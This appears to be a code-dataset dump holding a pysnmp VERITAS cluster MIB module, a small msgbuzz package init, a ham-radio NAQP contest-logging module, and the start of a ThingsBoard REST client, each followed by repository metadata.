clusterGroupRestInRspnToPerstResGoOnlineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2) + (0,9)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterFirstSystemUpTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemRestartingByHashadowTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemInJeopardyTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,3)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemFaultedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,4)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemJoinedClusterTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,5)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemExitedManuallyTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,6)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemUpButNotInClusterTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,7)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterSystemUsageExceededThresholdTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3) + (0,8)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterGUIUserLoginTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 6) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterAgentRestartingTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 8) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterAgentFaultedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 8) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCRlinkInconsistentTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,1)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCRlinkNotUpToDateTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,2)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCTakeoverFailedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,3)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCMigrateFailedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,4)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCTakeoverSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,5)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCMigrateSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,6)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCActingSecondaryTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,7)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCResyncFailedTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,8)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCResyncSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,9)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
clusterRDCGroupOfflineTrap = NotificationType((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10) + (0,10)).setObjects(("VERITAS-CLUSTER-MIB", "severityId"), ("VERITAS-CLUSTER-MIB", "eventTime"), ("VERITAS-CLUSTER-MIB", "entityName"), ("VERITAS-CLUSTER-MIB", "entityType"), ("VERITAS-CLUSTER-MIB", "entitySubType"), ("VERITAS-CLUSTER-MIB", "entityState"), ("VERITAS-CLUSTER-MIB", "trapOrigin"), ("VERITAS-CLUSTER-MIB", "systemName"), ("VERITAS-CLUSTER-MIB", "systemLocation"), ("VERITAS-CLUSTER-MIB", "entityContainerName"), ("VERITAS-CLUSTER-MIB", "entityContainerType"), ("VERITAS-CLUSTER-MIB", "entityOwner"), ("VERITAS-CLUSTER-MIB", "message"))
mibBuilder.exportSymbols("VERITAS-CLUSTER-MIB", clusterRDCGroupOfflineTrap=clusterRDCGroupOfflineTrap, clusterSystemJoinedClusterTrap=clusterSystemJoinedClusterTrap, clusterGroupOnlineTrap=clusterGroupOnlineTrap, clusterSystemUpButNotInClusterTrap=clusterSystemUpButNotInClusterTrap, clusterGroupInitiatingForSwitchingTrap=clusterGroupInitiatingForSwitchingTrap, message=message, clusterGroupAutoDisabledTrap=clusterGroupAutoDisabledTrap, clusterSystemRestartingByHashadowTrap=clusterSystemRestartingByHashadowTrap, clustertraps=clustertraps, clusterSystemUsageExceededThresholdTrap=clusterSystemUsageExceededThresholdTrap, clusterAgentFaultedTrap=clusterAgentFaultedTrap, veritasCluster=veritasCluster, gcmHeartbeatTraps=gcmHeartbeatTraps, clusterResourceRestartingByAgentTrap=clusterResourceRestartingByAgentTrap, clusterFirstSystemUpTrap=clusterFirstSystemUpTrap, entityState=entityState, vcsHeartbeatTraps=vcsHeartbeatTraps, clusterGroupRestartingTrap=clusterGroupRestartingTrap, systemLocation=systemLocation, clusterSystemInJeopardyTrap=clusterSystemInJeopardyTrap, products=products, groupsTraps=groupsTraps, clusterRDCMigrateSuccessTrap=clusterRDCMigrateSuccessTrap, gcmSiteTraps=gcmSiteTraps, resourcesTraps=resourcesTraps, clusterRDCActingSecondaryTrap=clusterRDCActingSecondaryTrap, clusterGUIUserLoginTrap=clusterGUIUserLoginTrap, entityType=entityType, clusterGroupFaultedAndNowhereToFailoverTrap=clusterGroupFaultedAndNowhereToFailoverTrap, PYSNMP_MODULE_ID=veritasCluster, clusterGroupRestInRspnToPerstResGoOnlineTrap=clusterGroupRestInRspnToPerstResGoOnlineTrap, systemName=systemName, clusterSystemExitedManuallyTrap=clusterSystemExitedManuallyTrap, clusterResourceWentOnlineByItselfTrap=clusterResourceWentOnlineByItselfTrap, systemsTraps=systemsTraps, entityOwner=entityOwner, clusterRDCTakeoverFailedTrap=clusterRDCTakeoverFailedTrap, clusterRDCResyncSuccessTrap=clusterRDCResyncSuccessTrap, clusterResourceNotGoingOfflineTrap=clusterResourceNotGoingOfflineTrap, agentsTraps=agentsTraps, entityName=entityName, peerSystemLocation=peerSystemLocation, clusterAgentRestartingTrap=clusterAgentRestartingTrap, clusterRDCRlinkInconsistentTrap=clusterRDCRlinkInconsistentTrap, clustertrapvars=clustertrapvars, externalTraps=externalTraps, eventTime=eventTime, clusterGroupConcurencyViolationTrap=clusterGroupConcurencyViolationTrap, severityId=severityId, clusterRDCResyncFailedTrap=clusterRDCResyncFailedTrap, trapOrigin=trapOrigin, entityContainerType=entityContainerType, rdcTraps=rdcTraps, entitySubType=entitySubType, clusterResourceMonitorTimeoutTrap=clusterResourceMonitorTimeoutTrap, clusterRDCMigrateFailedTrap=clusterRDCMigrateFailedTrap, entityContainerName=entityContainerName, clusterResourceStateUnknownTrap=clusterResourceStateUnknownTrap, veritassoftware=veritassoftware, clusterGroupFaultedTrap=clusterGroupFaultedTrap, clusterRDCTakeoverSuccessTrap=clusterRDCTakeoverSuccessTrap, peerSystemName=peerSystemName, clustertrapsGroups=clustertrapsGroups, clusterResourceFaultedTrap=clusterResourceFaultedTrap, clusterSystemFaultedTrap=clusterSystemFaultedTrap, clusterRDCRlinkNotUpToDateTrap=clusterRDCRlinkNotUpToDateTrap, clusterGroupOfflineTrap=clusterGroupOfflineTrap, vcsTraps=vcsTraps)
| 328.787879 | 3,217 | 0.727803 | 3,435 | 32,550 | 6.89607 | 0.055022 | 0.278369 | 0.338019 | 0.011314 | 0.751055 | 0.740966 | 0.740966 | 0.740966 | 0.739995 | 0.738475 | 0 | 0.041877 | 0.06682 | 32,550 | 98 | 3,218 | 332.142857 | 0.737975 | 0.0102 | 0 | 0 | 0 | 0 | 0.472073 | 0.001366 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.065934 | 0 | 0.065934 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
94306cc9ff26de33fef5807edc851246fd4527d6 | 69 | py | Python | msgbuzz/__init__.py | sihendra/msgbus | ac67be1211732def95581e541239eb1ab1e6c00d | [
"BSD-3-Clause"
] | 2 | 2020-03-23T09:14:00.000Z | 2020-04-17T03:55:24.000Z | msgbuzz/__init__.py | sihendra/msgbuzz | ac67be1211732def95581e541239eb1ab1e6c00d | [
"BSD-3-Clause"
] | null | null | null | msgbuzz/__init__.py | sihendra/msgbuzz | ac67be1211732def95581e541239eb1ab1e6c00d | [
"BSD-3-Clause"
] | null | null | null | from .generic import MessageBus
from .generic import ConsumerConfirm
| 23 | 36 | 0.855072 | 8 | 69 | 7.375 | 0.625 | 0.372881 | 0.576271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115942 | 69 | 2 | 37 | 34.5 | 0.967213 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
946fef83ed286e5659b4c0099f7966545eff1a50 | 2,890 | py | Python | contest/Contest_NAQP.py | dfannin/loggy | 9bb0eb7167966615666f1d15106dad72fcd8daa9 | [
"BSD-3-Clause"
] | 2 | 2017-01-28T17:54:33.000Z | 2017-05-13T11:46:18.000Z | contest/Contest_NAQP.py | dfannin/loggy | 9bb0eb7167966615666f1d15106dad72fcd8daa9 | [
"BSD-3-Clause"
] | null | null | null | contest/Contest_NAQP.py | dfannin/loggy | 9bb0eb7167966615666f1d15106dad72fcd8daa9 | [
"BSD-3-Clause"
] | null | null | null |
from . import Contest
class NAQP_SSB(Contest.Contest):
def __init__(self,config):
super(NAQP_SSB, self).__init__(config)
self.name = "NAQP-SSB"
self.description = "North American QSO Party - Single Side Band"
def _transform(self,row):
if row['mode'] == "SSB":
return row
else:
return []
def _checkmulti(self):
band = self.qso['band']
mode = self.qso['mode']
comment = self.qso['comment'].split(',')
qth = comment[2].upper()
bandmodeqth = band + " " + mode + " " + qth
if not bandmodeqth in self.multilist:
self.multilist[bandmodeqth] = 1
else:
self.multilist[bandmodeqth] += 1
def format_cabrillo_row(self):
if not self.qso:
return ''
freq = int( float(self.qso['freq']) * 1000.0 )
mode = self.qso['mode']
if ( mode == 'SSB' ):
mode = 'PH'
qso_date = self.qso['qso_date']
qso_date = qso_date[:4] + '-' + qso_date[4:6] + '-' + qso_date[6:]
comment = self.qso['comment'].split(',')
name = comment[1].upper()
qth = comment[2].upper()
return 'QSO: %5s %2s %s %s %-15s %-10s %-3s %-15s %-10s %-3s' % (freq, mode, qso_date, self.qso['time_on'] , self.config['default']['call'].upper(), self.config['contest']['name'].upper(), self.config['contest']['qth'].upper(), self.qso['call'], name, qth)
class NAQP_CW(Contest.Contest):
def __init__(self,config):
super(NAQP_CW, self).__init__(config)
self.name = "NAQP-CW"
self.description = "North American QSO Party - Continuous Wave"
def _transform(self,row):
if row['mode'] == "CW":
return row
else:
return []
def _checkmulti(self):
band = self.qso['band']
mode = self.qso['mode']
comment = self.qso['comment'].split(',')
qth = comment[2].upper()
bandmodeqth = band + " " + mode + " " + qth
if not bandmodeqth in self.multilist:
self.multilist[bandmodeqth] = 1
else:
self.multilist[bandmodeqth] += 1
def format_cabrillo_row(self):
if not self.qso:
return ''
freq = int( float(self.qso['freq']) * 1000.0 )
mode = self.qso['mode']
if ( mode == 'SSB' ):
mode = 'PH'
qso_date = self.qso['qso_date']
qso_date = qso_date[:4] + '-' + qso_date[4:6] + '-' + qso_date[6:]
comment = self.qso['comment'].split(',')
name = comment[1].upper()
qth = comment[2].upper()
return 'QSO: %5s %2s %s %s %-15s %-10s %-3s %-15s %-10s %-3s' % (freq, mode, qso_date, self.qso['time_on'] , self.config['default']['call'].upper(), self.config['contest']['name'].upper(), self.config['contest']['qth'].upper(), self.qso['call'], name, qth)
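# Worked example (hypothetical QSO and config values, shown only to illustrate
# the Cabrillo formatting above; the real self.qso and self.config come from the
# Contest base class, and the callsigns/names here are placeholders):
#
#   self.qso = {'freq': '21.050', 'mode': 'CW', 'qso_date': '20200118',
#               'time_on': '1830', 'call': 'K6ABC', 'comment': '599,BOB,CA'}
#   self.config['default']['call'] = 'w1xyz'
#   self.config['contest']['name'] = 'alice'
#   self.config['contest']['qth'] = 'ca'
#
#   format_cabrillo_row() then yields a line of the form (column widths per the
#   %-15s/%-10s/%-3s specifiers; an 'SSB' mode would be rewritten to 'PH'):
#   QSO: 21050 CW 2020-01-18 1830 W1XYZ           ALICE      CA  K6ABC           BOB        CA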
| 36.582278 | 264 | 0.535986 | 356 | 2,890 | 4.227528 | 0.171348 | 0.093023 | 0.029236 | 0.039867 | 0.944851 | 0.944851 | 0.862458 | 0.825249 | 0.772093 | 0.772093 | 0 | 0.025218 | 0.286505 | 2,890 | 78 | 265 | 37.051282 | 0.704656 | 0 | 0 | 0.835821 | 0 | 0.029851 | 0.138802 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119403 | false | 0 | 0.014925 | 0 | 0.283582 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ca4ffbe85585c61f0ca246cd2516197b32f1b9f7 | 34,967 | py | Python | tb_rest_client/api/api_pe/ocean_connect_integration_controller_api.py | maksonlee/python_tb_rest_client | a6cd17ef4de31f68c3226b7a9835292fbac4b1fa | [
"Apache-2.0"
] | 1 | 2021-07-19T10:09:04.000Z | 2021-07-19T10:09:04.000Z | tb_rest_client/api/api_pe/ocean_connect_integration_controller_api.py | moravcik94/python_tb_rest_client | 985361890cdf4ccce93d2b24905ad9003c8dfcaa | [
"Apache-2.0"
] | null | null | null | tb_rest_client/api/api_pe/ocean_connect_integration_controller_api.py | moravcik94/python_tb_rest_client | 985361890cdf4ccce93d2b24905ad9003c8dfcaa | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class OceanConnectIntegrationControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def process_request_using_delete(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_delete(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
